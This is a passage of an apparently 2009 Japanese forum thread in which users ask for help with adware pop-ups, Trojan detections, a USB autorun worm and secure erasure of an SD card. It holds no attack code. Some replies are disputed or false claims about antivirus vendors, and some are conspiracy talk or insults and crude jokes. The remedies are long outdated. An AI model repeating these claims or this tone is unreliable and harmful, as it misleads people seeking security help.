でもなぜフォルダを開くたびに送信しやがるのでしょうね
574名無しさん@お腹いっぱい。:2009/07/22(水) 08:29:23
>>573
>でもなぜフォルダを開くたびに送信しやがるのでしょうね

それれは別物。なにがどこと通信してるのか特定してから相談してくれ。エスパーじゃねぇんだ。
575名無しさん@お腹いっぱい。:2009/07/22(水) 08:54:22
>>564
>気になってカペルスキーオンラインスキャンをしたら
>C:\Program Files\Trend Micro\Virus Buster\Quarantine\195.tmp
フォルダを見る限りでは、バスターが隔離しているものですので、実害はありません。

>ファイアフォックス起動時に一瞬小さいウインドウの残像?が見えるのと
>このウィルスは関係がありますか?
断定はできませんが、検出されたフォルダ名からすると別物ではないでしょうか。

レジストリエディタ等(Spybotのツール[システムスタートアップ]やa-squared HiJackFreeなどの方がわかりやすいかも)で
不審なファイルを開こうとするものが入っていないかチェックしてください。自動実行に登録されているものは、
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run もしくは、 RunOnce などに登録されて
いると思います。

7/16にFirefox 3.5.1がリリースされていますので、3.0.11から更新してみるのもよいかもしれません。

>駆除するには再セットアップでしょうか?
知らないうちになにかに感染してしまった場合の対処はそれ以外にありません。
他になにか残っているのか、どんな変更を加えられているのかを特定できませんから
他の方法で、安全な環境に戻ったと断定することはできないからです。

なお、「Trojan-PSW.Win32.Nilage.djl」については、Flash Playerの脆弱性を突いて、オンラインゲームのアカウント情報などを
盗むウィルスです。去年、XREAの広告サーバーが乗っ取られて仕込まれたものがそれのようです。
まとめサイトがありますので、ご覧ください。
ttp://www.geocities.jp/pehchunpm/mondai_XREA.htm
576名無しさん@お腹いっぱい。:2009/07/22(水) 13:59:36
>>574
俺にもわからないお
そういうのどうやって調べるんだお?
カスペスキャンしても何もないって言うから問題ないよね?
577名無しさん@お腹いっぱい。:2009/07/22(水) 14:08:06
     , -―- 、  
  /了 l__〕      〈]  
   7| K ノノノ ))))〉. 
   l」 |」(l| ┃ ┃||  
   | |ゝリ. '' ヮ'丿! 
    | | /\_V〕、l|
    l | / /<ノ|ト'.l
578名無しさん@お腹いっぱい。:2009/07/22(水) 15:51:01
すいませんよろしくお願いしますm( __ __ )m
【使用OS】      『XP SP3』
【使用ブラウザ】  『Firefox 3.0.1.1』
【セキュリティソフトと年式】     『avast! 4.8 Home Edition』
【回線の種類・ルータの有無】 『ケーブルネット』

【具体的な症状】   『サイトを開いたり戻ったりをすると時たま勝手に新しいページが開く。ページは毎回違う。』
【過程と措置】    『ググッてスパイウェアと判明→Spybot Search、Ad-Aware、cwshredderとやったが駆除できず。』

次は何を試したらいいでしょうか?Firefoxを使用してますがIEでもなります。Sleipnirでは起きません。


よろしくお願いします。
579名無しさん@お腹いっぱい。:2009/07/22(水) 16:07:04
>ググッてスパイウェアと判明

はい、検出したソフト名、検出名称、検出したファイル名をどうぞ。
580578:2009/07/22(水) 16:24:21
>>579さん
ググッたら同じ症状の人の質問がでてきて。その動作が起きているのはスパイウェアに感染しているよって解答で
Spybot等のソフトで対処しましょうってなってたのでスパイウェアと判断しました。
なので原因の検出ファイル名とかは分かりません。すいません。
SpybotとAd-Awareでスキャンしたら5個ぐらいなんかでましたがすぐに削除してしまいファイル名は覚えてませんです。
cwshredderでは何もでませんでした。

これらを試した後にFirefox使っても症状が改善されないので質問した次第です。
581名無しさん@お腹いっぱい。:2009/07/22(水) 16:27:27
>>580
SpybotやAd-Awareなら、ログに残ってると思うけど。
582名無しさん@お腹いっぱい。:2009/07/22(水) 17:03:16
■やった方がいいこと
カスペオンラインスキャンをかける。
必要のないブラウザ機能拡張は全部切る。
Flash Player を削除して最新版に入れ直す。
WindowsUpdateを全て当てる。
AcrobatReaderを最新版(9.12)に更新する。(インストール後、必ず、ヘルプからアップデートの有無をチェックを行なう)
AcrobatReaderの環境設定から、JavaScriptの項目を選んで、AcrobatJavaScriptを使用のチェックを外す。
不審なサイト(アダルトサイトとか)を訪問しない。

■感染していた場合
もし、FlashPlayerやAcrobatReaderの脆弱性を利用するものだった場合、すり抜けてマルウェアに侵入されている
可能性があります。その場合、奇麗に除去するのは困難ですので、必要最低限のデータをバックアップしてから
OSの入れ直し(またはPCリカバリ)を行わなければなりません。
583 ◆N9P3SuvBPo :2009/07/22(水) 17:10:32
>578
どんなサイトですか?
584名無しさん@お腹いっぱい。:2009/07/22(水) 20:37:39
レス遅くなりすいませんm( __ __ )m
>>580書いた後、SUPERAntiSpywareってやつを試してみたが駄目で次に>>582さんのレスを見て
カスペルスキー オンラインスキャナってのをやりにいったんですが、使い方が分からずorz(ボタン押した後の
新しい画面の同意するってところが一向に押せる状態にならず、左側のあなたのパソコンの状態を調べてますとでてる
とこがずっとそのままでどうしたらいいか分からないのですorz もうちょっと待てばいいのですかね?)
なのでAcrobatReaderを最新にして再起動して放置してご飯食べてました。

今からFlash Playerを入れなおしてもう一回オンラインスキャンしてみます。

>>583さん
サイトはどこでもなんですが、スタートページはグーグルなんですがこっからヤフーでもyoutubeでも誰かのブログでも
開いたり戻ったりしてるとたまに勝手に新しいページがもう一個firefoxが立ち上がって表示されます。
開くページはエロだったりフラッシュゲームだったりおめでとうございます〜が当選しましたみたいなページです。
585 ◆N9P3SuvBPo :2009/07/22(水) 20:45:55
>584
たぶん今流行ってるアドウェアだと思う。

コンパネのプログラムの追加と削除ってとこに
Internet Saving OptimizerやMedia Access Startup、
またはSystem Search Dispatcherという入れた覚えのないものは無いか?
これらのものをアンインストールすれば症状は収まるはず。
アドウェアだから上手くいけばリカバリは避ける事ができると思います。

ただ…それでも不安が残るようでしたら思いきってリカバリして下さい。
不安一気に消え去るので。
586578:2009/07/22(水) 21:38:49
>>585さん
ありました!! それら3つが見事にありましたw で削除したらもう新しく開かなくなりました。
感謝感激です。本当にありがとうございましたm( __ __ )m

他のみなさんも協力ありがとうございましたm( __ __ )m

587名無しさん@お腹いっぱい。:2009/07/22(水) 22:34:00
わかるかたお願いします。
OSはVistaです。
常駐しているセキュリティソフトには、レジストリのウィルススキャンの機能がありません。
フリーソフトで、レジストリのスキャン出来るソフトはあるのでしょうか?
もしあるとしたら、導入してもよいのでしょうか?
588名無しさん@お腹いっぱい。:2009/07/22(水) 22:43:20
>>585
(ο^д^)ノシ


規制されてたww
589 ◆N9P3SuvBPo :2009/07/22(水) 22:48:08
今流行ってるアドウェア(エロサイトやゲームサイトなどが、勝手に立ち上がる奴)なんだが、
経路は主に「RapidShare」や「MegaUpload」とかのダウンローダー系のサイトだと思いますね。
詳しくは前スレor前々スレに俺が、G DATAのニュース記事のリンクを貼っておいたから、
見ればわかると思います。またG DATAの公式サイトの「ニュース」にも、その記事がまだあります。

あと、あっちの方をもう一度確認してみたんですが、
コンパネのプログラムの追加と削除に
Internet Saving Optimizer
Media Access Startup
System Search Dispatcher
の他にも
GamingHarbor Toolbar
というものが、インストールされるみたいです。

これら4つのもの(無いものはスルー)をアンインストールして、
関連するフォルダの削除、HijackThisで関連するエントリーのFIX(無ければスルー)、
今の所、これで症状は消えてくれます。
590 ◆N9P3SuvBPo :2009/07/22(水) 22:49:39
>588
φ(^∀^)ノシ

>>587
質問返しになってしまいますが、今使っているセキュリティソフトは?
591587:2009/07/22(水) 23:18:43
>>590
フレッツウィルスクリアです。
フルスキャンしても、そういえばレジストリはスキャンしてないって気付いたんです。
どうなんでしょうか?
フリーソフトがあったら、導入してよいのでしょうか?
592名無しさん@お腹いっぱい。:2009/07/22(水) 23:20:00
>>590
(ο^д^)ノシ
593 ◆N9P3SuvBPo :2009/07/22(水) 23:34:08
>>591
使ってて特に不自由してなければ、そのままで良いのでは?
レジストリのスキャンするソフト…
スキャンと言っても自動ではなく、【ユーザーの目視による解析】が必要なソフトになってしまうのですが、
「HijackThis」や「SilentRunners」などがあります。
フリーソフトで常駐はしないので、セキュリティソフトと一緒に使えます。

>>592
φ(-∀-)ノシ
594587:2009/07/22(水) 23:40:11
>>593
あ、HijackThisは知ってます。
以前アダ被で健康診断した事があるので。
いまだに取っておいてました。

レジストリのウィルススキャン出来ましたっけ?
ちょっと調べなおします。
595名無しさん@お腹いっぱい。:2009/07/23(木) 00:17:00
新規の質問ですが宜しくお願いします
私の知人が変なツールに手を出してしまい作成者にファイル・文章等漏れているようです
解析を御願いされたのですが私自身には無理だと思いましたので皆様に助けていただきたいのです

ttp://strange.white-black.org/hangame/

チャベツというツールなのですが、キーロガーの様なものでしょうか
上記サイトには被害者の写メが記載されており、少々気の毒に思います
何卒宜しく御願いします
スレチでしたら申し訳ありません
596名無しさん@お腹いっぱい。:2009/07/23(木) 03:16:43
Comodoをインストールしたいんですけど
Windowsファイアウォールはアンインストールするべきですか?
597名無しさん@お腹いっぱい。:2009/07/23(木) 03:21:09
停止でいいです。
598名無しさん@お腹いっぱい。:2009/07/23(木) 03:33:30
こんな時間にどうも
599名無しさん@お腹いっぱい。:2009/07/23(木) 10:13:23
使用OS】      『windowsXP SP3』
【PCスペック】    『CPU: core2duo 2.2GHz 、メモリ: 4GB』  (「システムのプロパティ」参照)
【使用ブラウザ】  『Firefox 3.0.1.1』 例、Firefox 3
【Microsoft Updateの更新の状態】 『自動』
【セキュリティソフトと年式】     『ノートン2009』
【その他スパイウェア対策ソフト】 『上に同じ』
【回線の種類・ルータの有無】  『ADSL・ルータ有』

【具体的な症状】 『ブラウザを起動させた時、ページの戻るや進むを押した時、いろんなサイトを見てる時、
勝手に新規に新しいウィンドウが開いてしまう。』
【過程と措置】   『ノートンでスキャンしたがまだ上の症状が出る。』
【その他】  『このウイルスの正体を知りたいのですが、誰か分かる人いませんか?』
600名無しさん@お腹いっぱい。:2009/07/23(木) 10:15:14
>>589
601名無しさん@お腹いっぱい。:2009/07/23(木) 10:22:58
>>599
OTL
ttp://oldtimer.geekstogo.com/OTL.exe
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行します
上段にある「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストが自動的に保存されています

RootRepeal - Rootkit Detector
ttp://rootrepeal.googlepages.com/

RootRepealの最新バージョンをデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブになっています)
ログ抽出走査が停止したら、
「RootRepeal report.Txt」がメモ帳で開いて、C:にテキストが自動的に保存されています

OTLとRootRepealのログを新規フォルダにコピー&ペーストしてから、フォルダを圧縮
件名とフォルダ名をを、「[ Report ] - Infection log report」として以下へ送信

■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
https://submit.symantec.com/websubmit/retail.cgi
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポート で調査依頼の提出が出来ます

これでワクチンが作られるので、次回のパターンファイル更新で対応されますw
602名無しさん@お腹いっぱい。:2009/07/23(木) 10:54:35
>>600さん
>>589を読んで方法を試してみたら、コンパネのところに
Internet Saving Optimizer
Media Access Startup
System Search Dispatcher
というものがありました!
この3つのプログラムを削除したところ、症状は消えました!
いつもなら、いろんなサイト見てる時に、フラッシュゲームやおめでとうございます〜
といったウィンドウが開いていたのが、今は開く気配はありません!
ただどこで感染したのかハッキリと覚えてないのです。

あとは>>589のとおりに関連するフォルダの削除・HijackThisというものを使って駆除
で良いんですよね?

>>601は何だったんでしょう?
ノートンを使ってるから試そうと思ったのですが、症状が無くなったので
試さなくても良いんですよね?
てかワクチン作られて、パターンファイル更新まで、待ってる余裕なんて無いです。
603名無しさん@お腹いっぱい。:2009/07/23(木) 11:47:46
なんかムカつく
604名無しさん@お腹いっぱい。:2009/07/23(木) 13:25:49
>>603
m9(^Д^)プギャー
605名無しさん@お腹いっぱい。:2009/07/23(木) 14:42:39
>>601=603はハチ公か
迷惑してるだろうなSymantecも
606名無しさん@お腹いっぱい。:2009/07/23(木) 14:49:47
アダ被で解凍してるイカって奴
なんでアダ被の解答者じゃないのに解答してんの?
607名無しさん@お腹いっぱい。:2009/07/23(木) 15:00:30
永久保存とかって何考えてんの?って思う
608名無しさん@お腹いっぱい。:2009/07/23(木) 15:02:42
アダ被とか関係ない
アダ被のことはアダ被で聞け
609名無しさん@お腹いっぱい。:2009/07/23(木) 16:51:59
学校のPC使ってたら、USBメモリ内のデータが読み込めなりました。

開いてみたら、いかにも怪しい「autorun.inf」と「filouf.bat」ってファイルが
あり、何度消しても(shift+delete)すぐに戻ってる。
フォルダオプションの「全てのファイルを表示」は無効化されてて、勝手に表示しない設定になる。

因みに学校PCにはノートンアンチウィルスが入っていて、「hbs.exe」等には反応する。

上記の状態でどんなウイルス(ワーム)か判る方居られましたら情報をお願いします。
家のPCでUSBメモリ使えなくて困っているので、駆除方法も判ればお願いします。
610名無しさん@お腹いっぱい。:2009/07/23(木) 17:09:03
>>609
>>601
611609:2009/07/23(木) 17:36:11
>>610

先ず報告ってことですね、やってみます。
有難うございます。
612名無しさん@お腹いっぱい。:2009/07/23(木) 18:14:05
>>603
くそワロタww
613名無しさん@お腹いっぱい。:2009/07/23(木) 18:18:14
>>608
ずいぶん神経質ですねあなた
なにか不都合でも?
614名無しさん@お腹いっぱい。:2009/07/23(木) 18:19:28
【使用OS】      『Vista64,w2k,XP』
【PCスペック】    『w2kはシステムの動くぎりぎり程度』
【Microsoft Updateの更新の状態】 『自動』
【セキュリティソフトと年式】     『AVGなど動く物の体験版・キングソフトの無料』

何ぞ軽くて安いソフトはありませんか?
AVGすら動かないPCとかあるんですが・・・
615名無しさん@お腹いっぱい。:2009/07/23(木) 18:21:41
>>606
アダ被の回答者とか別に決まってないし誰でも回答していいだろjk
616名無しさん@お腹いっぱい。:2009/07/23(木) 18:25:46
>>615
誰でも回答していいの?なにそれこわい
617名無しさん@お腹いっぱい。:2009/07/23(木) 18:39:02
>>616
何勘違いしてるんだw
誰でも案内レス回答入れられるよ?w
ただイカや八頭みたいなトンチンカンなことすると当然待った掛けられる

ただあそこ殺伐としすぎて新規回答者が来ても居つかないけどw

618名無しさん@お腹いっぱい。:2009/07/23(木) 18:45:41
あそこ次第に回答者できる人減ってったよなw
なのに質問者は増える一方ww
どうしてこんなことにw
619名無しさん@お腹いっぱい。:2009/07/23(木) 19:14:53
>>617
そうなんだ、運営管理はセキュリティ達人者で動いてると思ってた
もし自分が投稿してイカ君が回答して来たら、無視しよっと
620 ◆N9P3SuvBPo :2009/07/23(木) 19:42:41
>618
俺のせいだ。
昔よくこのスレやウイルス情報質問スレに来てた質問者を誘導してたからな。

>>619
イカって人が回答するのは、今のとこ主に"ワンクリに引っ掛かった人"のみですよ。
621619:2009/07/23(木) 19:53:03
>>620
何がどうあれ、イカ君の言葉遣いが気にいらない
とても不快感を抱くんです
622名無しさん@お腹いっぱい。:2009/07/23(木) 20:02:05
>>619みたいに勘違いしてる人結構いるのかな
やたら回答者が増えないのもそのせいなのだろうか
623名無しさん@お腹いっぱい。:2009/07/23(木) 20:41:22
>>613
ずいぶん馬鹿ですねあなた
624名無しさん@お腹いっぱい。:2009/07/23(木) 20:43:21
>>621
おまえも不快だよ
いくら初心者でもくだらねえ質問すんな
625名無しさん@お腹いっぱい。:2009/07/24(金) 00:10:38
すみません。質問があります。

先週、セキュリティソフトを停止した状態で5分ほどインターネットに接続してしまいました。
慌てて接続を切断し、ウイルスバスターで検索。
次にシマンテックのオンラインスキャンを行いました。
結果は両方とも検出なしでした。
でも使っていると、普段はスムーズに動作していたソフトウェアの動きがぎこちなくなることが多くなっているような気がします。
何かセキュリティソフトでは検出できないようなウイルスなどに感染してしまったのではないかと不安になっています。
このような事例の場合、他にどのようなチェックをしたら良いでしょうか?
接続環境はフレッツ光で有線LANです。
申し訳ございませんが、アドバイスのほどよろしくお願いします。
626名無しさん@お腹いっぱい。:2009/07/24(金) 00:15:11
>>623
ずいぶん馬鹿ですねあなた
627 ◆N9P3SuvBPo :2009/07/24(金) 00:31:19
>625
少しでも不安があればリカバリが一番です。
他にレスがあればそちらの方も参考してください。
628名無しさん@お腹いっぱい。:2009/07/24(金) 00:45:05
>>625
ルータが無い場合でもAdobe Readerや(あればだが)windows update、アドオンソフトが最新パッチを当ててあり
5分の間にActiveXインストールダイアログが現れて許可してなければ感染の可能性は低いとおもう。
重く感じるならCPU利用率やメモリー使用量をみてみたら?
ちょっと上のレスで話題になっているのでリンクは張らないけど某サイトにPC健康診断掲示板があるので
どうしてもと言うのであれば(ググって)行ってみては?
>>627
(´ー`)ノシ
629名無しさん@お腹いっぱい。:2009/07/24(金) 08:22:08
>627
やはりリカバリを行うのが一番なのですね。
実は昨日、寝る前にオンラインスキャンをもう一度かけてみたらtrojan.dropperというものに感染しているという結果が出ました。
trojan.dropperについては誤検出の例もあるようですが、不安なのでリカバリをすることにします。
ありがとうございます。

>>628
ActiveXのインストールダイアログは表示されませんでしたが、windows updateなどのパッチは最新の状態ではありませんでした。
また、昨日オンラインスキャンをやり直したところ、trojan.dropperというウイルスに感染しているとの結果が出ました。
データのバックアップをとっていなかったので、リカバリは避けたかったのですが。
誤検出の可能性があるかもしれないにしても感染しているという結果が不安なので、諦めてリカバリをすることにします。
ありがとうございます。
630名無しさん@お腹いっぱい。:2009/07/24(金) 09:50:59
レジストリのアクセス許可ってさ、無闇に許可しまくるとセキュリティ的にヤバイ?

なんかMicrosoft Updateがうまくいかないから全部許可にしちゃおうかな〜…なんて…
631名無しさん@お腹いっぱい。:2009/07/24(金) 12:19:16
>>601
おい、ハチ公。パターン対応でブロックできるようになっても、除去する(削除ではなく影響も除去する)ワクチンはつくられねーぞ。

うそっぱち撒き散らしてないで、大人しくしてろよ。
632名無しさん@お腹いっぱい。:2009/07/24(金) 12:21:44
>>609
思いっきり感染してますな。

システム管理者に相談してPCリカバリして貰って、WindowsUpdateかけて、セキュリティソフト入れて、パターン更新してから
USBメモリぶっさして、そのUSBメモリに入ってるマルウェアを除去。

っつーか、勝手にUSBメモリなんか挿すから、お前さんが学校のPCを感染させたんじゃねーのか?
633名無しさん@お腹いっぱい。:2009/07/24(金) 12:23:04
>>630
とんでもなくやばい。OSが起動しなくなっても知らないよ。
634名無しさん@お腹いっぱい。:2009/07/24(金) 12:26:46
>>614
軽さだけなら、ESSかNOD32使え。英語がわかるならAntiVirの方がいい。

AVGが動かないんじゃなくて、メモリ足りなすぎてスワップで固まってるように見えるとかじゃないの?
もしかすると、複数のアンチウイルスソフト入れて衝突してるのかもしれないし、マルウェアに侵入されて
セキュリティソフトが停止させられているだけかもしれない。

多分、PCのリカバリ(またはOS入れなおし)からやった方がいいと思うが、それだけの種類のOS併記するのは
割れ物か?割れ物使用者は質問する権利ありません。とっとと正規OS買ってこい。話はそれからだ。
635名無しさん@お腹いっぱい。:2009/07/24(金) 12:47:33
>>633
そんなにヤバイの!?なんで?…じゃ、一つ一つログを見て変える事にします。後何回再起動すればいいのか・・・w

サンクス
636名無しさん@お腹いっぱい。:2009/07/24(金) 12:49:56
>>635
そもそも許可出さなきゃアップデートが上手く行かない環境がヤバい。
637名無しさん@お腹いっぱい。:2009/07/24(金) 12:52:47
>>636
やはりなぁ…

HDDも足りてないし1TBのHDD買って
環境を作り直そうと思います。
638名無しさん@お腹いっぱい。:2009/07/24(金) 15:17:40
すみません、デジカメで使用しているmicroSDHCカード(SanDiskの4GB)のデータを
何やっても復元不可能まで完全に消去したいんですけど、
以下の方法で復元不可能に出来ますか?

使ってるソフトはEraserというソフトで、選んでる方法は、
米国防総省準拠方式 US DoD 5220.22-M(8-306. /E,C and E)
(上書き7回、固定値1⇒...⇒固定値6⇒乱数⇒検証)
です。


データ抹消方法の種類
データ消去 上書き回数(回) 上書きパターン
NSA推奨方式        3           乱数2回⇒ゼロ
米陸軍準拠方式       3           乱数1回⇒固定値1回⇒固定値1回の補数
米海軍準拠方式       3           固定値1⇒固定値1の補数⇒乱数⇒検証
米空軍準拠方式       3           00⇒FF⇒固定値1⇒検証
米国防総省準拠方式    7           固定値1⇒...⇒固定値6⇒乱数⇒検証
グートマン推奨方式    35          固定値4回⇒固定値1〜固定値27⇒乱数4回


Eraser
http://eraser.heidi.ie/
Eraserについて
http://www.cybernetic-survival.net/shredder.htm
639名無しさん@お腹いっぱい。:2009/07/24(金) 15:19:15
物理的に折れ
640638:2009/07/24(金) 15:33:04
>>639
それが一番なのは分かってるのですが、
諸所の事情によりそれが出来ないのです。
どなたかそっち方面詳しい方>>638について教えてください。
641名無しさん@お腹いっぱい。:2009/07/24(金) 16:48:42
カスペでチェックするとキーロガーとかもチェックされる?
642名無しさん@お腹いっぱい。:2009/07/24(金) 17:01:24
まず水に浸します。
643名無しさん@お腹いっぱい。:2009/07/24(金) 17:04:36
>>638
デジカメで撮ったハメドリ画像を消すには十分過ぎるので安心していい

microSDHCカードはフラッシュメモリなので無駄に消し過ぎると壊れる
644名無しさん@お腹いっぱい。:2009/07/24(金) 17:06:01
円光の証拠隠滅におっさん必死wwwwwww
645名無しさん@お腹いっぱい。:2009/07/24(金) 17:07:41
sdカードくらいなら物理的にこわして捨てればよくない?
646名無しさん@お腹いっぱい。:2009/07/24(金) 17:08:57
あっだめなんだ
借りてるやつとかに円光動画を撮影したのかな?
647名無しさん@お腹いっぱい。:2009/07/24(金) 17:12:44
円光なんてするからいけないんだぞ。

素直にタイホされろ。
648名無しさん@お腹いっぱい。:2009/07/24(金) 17:42:09
>>641
もちろんそうよ
649名無しさん@お腹いっぱい。:2009/07/24(金) 19:08:29
>>638
       ∧,,_∧
      ( ´・ω・)∧∧|||   ポン
       /⌒ ,つ⌒ヽ) ポン
      o(___  (  __)

650名無しさん@お腹いっぱい。:2009/07/24(金) 19:40:12
>>638
気が済むまで
グートマン推奨方式をすればいい。

俺はDESTROY で NSA 方式しか使ったことがないが…
651638:2009/07/24(金) 22:18:42
>>643
ありがとうございます
とりあえず、Eraserの米国防総省準拠方式で消します
ほっと、ひと安心

>>644>>646>>647>>649
いや、そういうことではないです

>>650
最初、Eraserでグートマン方式選んだら
残り49時間とかなったんで諦めましたw
652名無しさん@お腹いっぱい。:2009/07/24(金) 23:07:08
>>651
NSA 方式でも2時間位だったような
653名無しさん@お腹いっぱい。:2009/07/25(土) 00:20:22
654638:2009/07/25(土) 01:09:45
>>652
そんなもんだった気がします
米国防総省準拠方式だと8時間です
寝る前にセットして朝には完全消去完了です
655名無しさん@お腹いっぱい。:2009/07/25(土) 02:04:46
みんなに円光円光いわれててワロタ
656名無しさん@お腹いっぱい。:2009/07/25(土) 02:43:30
おすすめのウイルスソフトありますか
どこのを買えばいいかわかりません
おすすめをおしえてください
657名無しさん@お腹いっぱい。:2009/07/25(土) 02:49:28
>>656
そういうスレがあるからそこで聞け
荒らすことが目的でここへ書き込んでいるのならどうぞ荒らしてくださいな
658656:2009/07/25(土) 02:58:03
うるせークズ
659656:2009/07/25(土) 02:59:56
658は自分ではありません
でも邪魔する人は死んで欲しいです
660656:2009/07/25(土) 03:02:14
ここはダメそうなので
お勧めのスレを教えてください
661名無しさん@お腹いっぱい。:2009/07/25(土) 06:44:01
ノートンでいいよ
662名無しさん@お腹いっぱい。:2009/07/25(土) 09:19:49
今回はノーマネーでフィニッシュです
663名無しさん@お腹いっぱい。:2009/07/25(土) 11:41:11
質問

・XP
・ウィルスバスター2008
・無線LAN未使用
・CATV

ウィルスバスターの無線LANパトロールが定期的に勝手にされる。
すると30個近く 「信頼済みでない機器がネットワークに接続されている」 と表示される。
無線LANは使用していないし、無線LANの機器も持っていない。すべて有線。
ネットにつながっているのはこの事案のパソコンのみ。周辺機器はプリンターのみ。

これはどういうことですか?
664名無しさん@お腹いっぱい。:2009/07/25(土) 11:44:33
カスペでチェックするとキーロガーとかもチェックされる?
665名無しさん@お腹いっぱい。:2009/07/25(土) 11:56:46
>>664
されないよ。はい次の方ー
666名無しさん@お腹いっぱい。:2009/07/25(土) 12:02:15
されるよ
667名無しさん@お腹いっぱい。:2009/07/25(土) 12:29:43
じゃあされないに1票
668名無しさん@お腹いっぱい。:2009/07/25(土) 13:01:10
(ο^д^)ノシ
669名無しさん@お腹いっぱい。:2009/07/25(土) 13:32:57
俺はされるに5票かな。
670名無しさん@お腹いっぱい。:2009/07/25(土) 17:32:26
対応しているものはチェックされる。未知のものはすり抜ける可能性が有る。
もちろん、チェック対象から外してしまえば、検知されない。
671名無しさん@お腹いっぱい。:2009/07/25(土) 17:38:52
>>663
どういうことですかって、それだけの情報で判るわけないだろ。

DomainView--
Microsoft Windows Netowrk に接続されたリモートコンピュータの各種情報を一覧表示するプログラム
http://www.wackyfactory.net/top.html#DomainView--
672名無しさん@お腹いっぱい。:2009/07/25(土) 19:12:31
WindowsXP SP3で
Windowsアップデート中に
C:\WINDOWS\Downloaded Program Files\HGStartJP21.exe
がアンチウィルスソフトに反応したんですが、削除したほうがよいでしょうか?
673名無しさん@お腹いっぱい。:2009/07/25(土) 20:38:42
>>671
そこをなんとか判断してアドバイスしろよ
〜〜じゃね?程度も言えないなら引っこんでろよw
674名無しさん@お腹いっぱい。:2009/07/25(土) 21:27:22
>>663
パソコン壊れてるんじゃね?
675名無しさん@お腹いっぱい。:2009/07/25(土) 21:41:59
八頭さんレジストリレイパーの件について教えて下さいませ。
676名無しさん@お腹いっぱい。:2009/07/25(土) 21:44:59
>>675
      //                    |
      /         ,ィ介i      |   う  ぶ  き
      {. |l     ,イ  ///||     |   ち   っ え
     ,-.、Vl      / | /// | |    」  に  と  ろ
      lこ!l ! ト   ト.l | !i  | ヽト、<   な  ば
      |  l Vヽ  トjヽ\!l   ,>‐_ニヽ     さ
     |  |   \ ! く__・、jiLノ・_´フ .||   れ
     | | __   ヽ} -‐   -─‐  レヘ.   ん
   _r‐j   >イ fヽ  l   ノ  __    ,イ-ハ
  / ′、   i   {ノ-、 ヽ  `t_/  /| /´ヽ
 〈 ヽ    l   |  }   \    -' j  |   \
  ヽ          /     |  ̄     L
677名無しさん@お腹いっぱい。:2009/07/25(土) 22:22:59
ハチ公はアク禁食らったのか?
678名無しさん@お腹いっぱい。:2009/07/26(日) 00:10:25
ハチ公は迷惑だから、アク禁されてくれる位の方が有り難いな。
679名無しさん@お腹いっぱい。:2009/07/26(日) 00:19:08
ヤマハ RT58i (Made in Japan)
ヤマハ RTX1200 (Made in Japan)
ヤマハ RT107e (Made in Japan)
ヤマハ RTX1100 (Made in Japan)

IODATA ETX-R (Made in China)
IODATA NP-BBRL (Made in China)
IODATA ETG-R (Made in China)

バッファロー BBR-4HG (Made in China)
バッファロー BHR-4RV (Made in China)
バッファロー BBR-4MG (Made in China)

MICRO RESEARCH NetGenesis SuperOPT100E MR-OPT100E (Made in China)
MICRO RESEARCH NetGenesis SuperOPT-GFive MR-OPTG5 (Made in China)

COREGA CG-BARPROG-X (Made in China)
COREGA CG-BARPROG (Made in China)
COREGA CG-BARPRO6 (Made in China)

PLANEX BRL-04M (Made in China)
680 ◆N9P3SuvBPo :2009/07/26(日) 01:35:34
寝なきゃいけないのにトラブルエロ見て抜いてる俺がいるφ(;'д`)ノシ
681名無しさん@お腹いっぱい。:2009/07/26(日) 03:12:46
>>680
(ο^д^)ノシ
682名無しさん@お腹いっぱい。:2009/07/26(日) 18:18:26
ウイルス対策ソフトで性能面(対策スピード)で優秀なのは、カスペルスキーですかね?...
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1028618145

このページでベストアンサーに選ばれてるsinkrokeroyonさんのデータが
リンクされてるページにないんですけど、どういうことなんでしょうか?

AV-TEST (国内市販品を対象にテスト)
http://antivirus-news.net/000/

やっぱり知恵袋みたいなところは業者が故意に偽情報流して
情報操作してるんでしょうか?
683名無しさん@お腹いっぱい。:2009/07/26(日) 18:51:10
てs
684名無しさん@お腹いっぱい。:2009/07/26(日) 18:54:01
教えてgooや知恵袋は2chと同じでデマの宝庫
何も知らない初心者を騙して製品を買わせようとする悪徳業者が
必死になって情報操作してるところ

まともなサイトなら管理者が発言をチェックして、
デマを削除するけど知恵袋も教えてgooもそれをやってない
ま、運営してるYahooやNTTも情報操作の共犯者だと言って良いだろうね
685名無しさん@お腹いっぱい。:2009/07/26(日) 19:05:43
そんなことより、豆腐は絹ごしか木綿か、だな
686名無しさん@お腹いっぱい。:2009/07/27(月) 00:38:55
(ο^д^)ノシ
687名無しさん@お腹いっぱい。:2009/07/27(月) 00:49:34
そんなこと言ったら、ネットはやくざ・まふぃあの資金源
事情を知らない一般人を騙してみかじめ稼いぐに都合のいいところ
まともなサイトなんて存在しないし全部ヒモ付きと診て間違いない。
688名無しさん@お腹いっぱい。:2009/07/27(月) 01:05:46
お、必死になって自己弁護を展開し始めたなw
689名無しさん@お腹いっぱい。:2009/07/27(月) 01:58:51
この気配・・・八頭だな!
690名無しさん@お腹いっぱい。:2009/07/27(月) 02:36:22
            /⌒丶         /⌒\
           /´    ヽ       /、   ヽ
           | /    |     /  /    |
       .    |     .|_lヽlヽ, | ,/ .    |
           |      |  ´Д`ヽ/ ノ    ,|
       .    |     |     |      丿
           ノヽ`   ノヽ      `   /
          /   ,/ソ         \ /
         (       ,/    `´   |
          \   イ  ´         |
           \  ヽ \    八  ノ
             ヽ    ` ー ´人` /
              \     / ´,、ヽノ
             ノ⌒    /      |
            /            ノ_
            | ノ     ヽ    丿 \
         /⌒l |.          /     \
         /  l,丿 ,       っ     .  \
        |  /  ´      /⌒`l        \
       丿 /   ,     ./   ヽ   ヽ    |
      /  |,   |    /      )\      ヽ
      ヽ ノ    ヽ__,/      . (  _\_     |
